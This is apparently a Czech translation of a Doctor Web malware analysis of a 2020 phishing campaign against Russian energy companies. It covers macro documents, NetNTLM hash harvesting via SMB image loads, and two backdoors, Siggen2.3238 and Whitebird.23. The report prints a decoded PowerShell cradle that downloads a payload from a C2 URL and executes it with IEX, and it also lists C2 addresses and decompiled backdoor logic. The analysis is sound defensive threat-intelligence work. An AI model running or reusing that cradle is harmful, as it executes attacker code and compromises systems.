Naše zkušenosti s vyšetřováním incidentů zabezpečení počítačů ukazují, že e-mail je stále jedním z nejběžnějších kanálů, které útočníci používají k prvotnímu pronikání do napadené síťové infrastruktury. Jedna neopatrná akce s podezřelým (nebo ne tak podezřelým) dopisem se stává vstupním bodem pro další infekci, a proto kyberzločinci aktivně využívají metody sociálního inženýrství, i když s různou mírou úspěchu.
V tomto příspěvku chceme hovořit o našem nedávném vyšetřování spamové kampaně zaměřené na řadu podniků v ruském palivovém a energetickém komplexu. Všechny útoky probíhaly podle stejného scénáře pomocí falešných e-mailů a zdálo se, že nikdo nevěnoval mnoho úsilí textovému obsahu těchto e-mailů.
Zpravodajství
Vše začalo na konci dubna 2020, kdy analytici viru Doctor Web odhalili spamovou kampaň, ve které hackeři rozeslali aktualizovaný telefonní seznam zaměstnancům řady podniků v ruském palivovém a energetickém komplexu. Samozřejmě to nebyl jednoduchý projev zájmu, protože adresář nebyl skutečný a dokumenty .docx stáhly dva obrázky ze vzdálených zdrojů.
Jeden z nich byl stažen do počítače uživatele ze serveru news[.]zannews[.]com. Je pozoruhodné, že název domény je podobný doméně protikorupčního mediálního centra Kazachstánu - zannews[.]kz. Na druhou stranu použitá doména okamžitě připomínala jinou kampaň z roku 2015 známou jako TOPNEWS, která používala zadní vrátka ICEFOG a měla trojské kontrolní domény s podřetězcem „news“ v názvu. Další zajímavou funkcí bylo, že při odesílání e-mailů různým příjemcům používaly požadavky na stažení obrázku buď různé parametry požadavku, nebo jedinečné názvy obrázků.
Domníváme se, že to bylo provedeno za účelem shromažďování informací k identifikaci „spolehlivého“ adresáta, který by pak měl zaručeno, že dopis otevře ve správný čas. Ke stažení obrázku z druhého serveru byl použit protokol SMB, což bylo možné provést pro sběr NetNTLM hash z počítačů zaměstnanců, kteří otevřeli přijatý dokument.
A zde je samotný dopis s falešným adresářem:
V červnu tohoto roku začali hackeři používat k nahrávání obrázků nový název domény sports[.]manhajnews[.]com. Analýza ukázala, že subdomény manhajnews[.]com byly používány ve spamu minimálně od září 2019. Jedním z cílů této kampaně byla velká ruská univerzita.
Do června také organizátoři útoku přišli s novým textem pro své dopisy: tentokrát dokument obsahoval informace o vývoji průmyslu. Text dopisu jasně naznačoval, že jeho autor buď není rodilým mluvčím ruštiny, nebo o sobě takový dojem záměrně vytváří. Bohužel, myšlenky rozvoje průmyslu se jako vždy ukázaly být jen zástěrkou - dokument opět stáhl dva obrázky, zatímco server byl změněn na download[.]inklingpaper[.]com.
Další inovace následovala v červenci. Ve snaze obejít detekci škodlivých dokumentů antivirovými programy začali útočníci používat dokumenty Microsoft Word zašifrované heslem. Útočníci se přitom rozhodli použít klasickou techniku sociálního inženýrství – oznámení o odměně.
Text dovolání byl opět napsán stejným stylem, což u adresáta vzbudilo další podezření. Server pro stahování obrázku se také nezměnil.
Všimněte si, že ve všech případech byly k odesílání dopisů použity elektronické schránky registrované na doménách mail[.]ru a yandex[.]ru.
Útok
Začátkem září 2020 nastal čas jednat. Naši viroví analytici zaznamenali novou vlnu útoků, kdy útočníci opět posílali dopisy pod záminkou aktualizace telefonního seznamu. Tentokrát však příloha obsahovala škodlivé makro.
Při otevření přiloženého dokumentu makro vytvořilo dva soubory:
- Skript VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, který byl určen ke spuštění dávkového souboru;
- Samotný dávkový soubor %APPDATA%configstest.bat, který byl zatemněn.
Podstata jeho práce spočívá ve spuštění shellu Powershell s určitými parametry. Parametry předané do shellu jsou dekódovány do příkazů:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Jak vyplývá z prezentovaných příkazů, doména, ze které se stahuje payload, je opět maskována jako zpravodajský web. Jednoduchý , jehož jediným úkolem je přijmout shell kód z příkazového a řídicího serveru a provést jej. Podařilo se nám identifikovat dva typy zadních vrátek, které lze nainstalovat na počítač oběti.
BackDoor.Siggen2.3238
První je BackDoor.Siggen2.3238 — naši specialisté se s tím dříve nesetkali a také o tomto programu nebyly žádné zmínky od jiných dodavatelů antivirů.
Tento program je backdoor napsaný v C++ a běžící na 32bitových operačních systémech Windows.
BackDoor.Siggen2.3238 je schopen komunikovat s management serverem pomocí dvou protokolů: HTTP a HTTPS. Testovaný vzorek používá protokol HTTPS. V požadavcích na server se používá následující User-Agent:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
V tomto případě jsou všechny požadavky dodávány s následující sadou parametrů:
%s;type=%s;length=%s;realdata=%send
kde každý řádek %s je odpovídajícím způsobem nahrazen:
- ID infikovaného počítače,
- typ zasílané žádosti,
- délka dat v poli reálných dat,
- data.
Ve fázi shromažďování informací o infikovaném systému backdoor generuje řádek jako:
lan=%s;cmpname=%s;username=%s;version=%s;
kde lan je IP adresa infikovaného počítače, cmpname je název počítače, username je uživatelské jméno, verze je řádek 0.0.4.03.
Tyto informace s identifikátorem sysinfo jsou odeslány prostřednictvím požadavku POST na řídicí server na adrese https[:]//31.214[.]157.14/log.txt. Pokud v reakci BackDoor.Siggen2.3238 přijme signál SRDCE, připojení je považováno za úspěšné a backdoor zahájí hlavní cyklus komunikace se serverem.
Podrobnější popis principů činnosti BackDoor.Siggen2.3238 je v našem .
BackDoor.Whitebird.23
Druhým programem je modifikace backdooru BackDoor.Whitebird, nám již známého z incidentu s vládní agenturou v Kazachstánu. Tato verze je napsána v C++ a je navržena tak, aby fungovala na 32bitových i 64bitových operačních systémech Windows.
Jako většina programů tohoto typu, BackDoor.Whitebird.23 navržený k navázání šifrovaného spojení s řídicím serverem a neoprávněné kontrole infikovaného počítače. Instalováno do kompromitovaného systému pomocí kapátka .
Vzorek, který jsme zkoumali, byla škodlivá knihovna se dvěma exporty:
- Google Play
- Test.
Na začátku své práce dešifruje konfiguraci pevně zapojenou do těla zadních vrátek pomocí algoritmu založeného na operaci XOR s byte 0x99. Konfigurace vypadá takto:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Aby byl zajištěn jeho stálý provoz, backdoor mění hodnotu zadanou v poli pracovní doba konfigurace. Pole obsahuje 1440 bajtů, které nabývají hodnot 0 nebo 1 a představují každou minutu každé hodiny dne. Vytvoří samostatné vlákno pro každé síťové rozhraní, které naslouchá rozhraní a hledá autorizační pakety na serveru proxy z infikovaného počítače. Když je takový paket detekován, backdoor přidá informace o proxy serveru do svého seznamu. Kromě toho kontroluje přítomnost proxy přes WinAPI InternetQueryOptionW.
Program zkontroluje aktuální minutu a hodinu a porovná je s údaji v terénu pracovní doba konfigurace. Pokud hodnota pro odpovídající minutu dne není nula, je navázáno spojení s řídicím serverem.
Navázání připojení k serveru simuluje vytvoření připojení pomocí protokolu TLS verze 1.0 mezi klientem a serverem. Tělo zadních vrátek obsahuje dva nárazníky.
První vyrovnávací paměť obsahuje paket TLS 1.0 Client Hello.
Druhá vyrovnávací paměť obsahuje pakety TLS 1.0 Client Key Exchange s délkou klíče 0x100 bajtů, Change Cipher Spec, Encrypted Handshake Message.
Při odesílání paketu Client Hello zapíše backdoor 4 bajty aktuálního času a 28 bajtů pseudonáhodných dat do pole Client Random, vypočítané takto:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Přijatý paket je odeslán na řídicí server. Odpověď (paket Server Hello) zkontroluje:
- soulad s protokolem TLS verze 1.0;
- korespondence časového razítka (první 4 bajty pole Random Data packet) zadaného klientem s časovou značkou zadanou serverem;
- shodu prvních 4 bajtů po časovém razítku v poli Random Data klienta a serveru.
V případě zadaných shod backdoor připraví paket Client Key Exchange. K tomu upravuje veřejný klíč v balíčku Client Key Exchange a také Encryption IV a Encryption Data v balíčku Encrypted Handshake Message.
Backdoor poté přijme paket z příkazového a řídicího serveru, zkontroluje, zda je verze protokolu TLS 1.0, a poté přijme dalších 54 bajtů (tělo paketu). Tím je nastavení připojení dokončeno.
Podrobnější popis principů činnosti BackDoor.Whitebird.23 je v našem .
Závěr a závěry
Analýza dokumentů, malwaru a použité infrastruktury nám umožňuje s jistotou říci, že útok připravila jedna z čínských skupin APT. Vzhledem k funkčnosti zadních vrátek, které se v případě úspěšného útoku instalují na počítače obětí, vede infekce minimálně k odcizení důvěrných informací z počítačů napadených organizací.
Velmi pravděpodobným scénářem je navíc instalace specializovaných trojských koní na lokální servery se speciální funkcí. Mohou to být řadiče domén, poštovní servery, internetové brány atd. Jak jsme mohli vidět na příkladu , takové servery jsou pro útočníky z různých důvodů zvláště zajímavé.
Zdroj: www.habr.com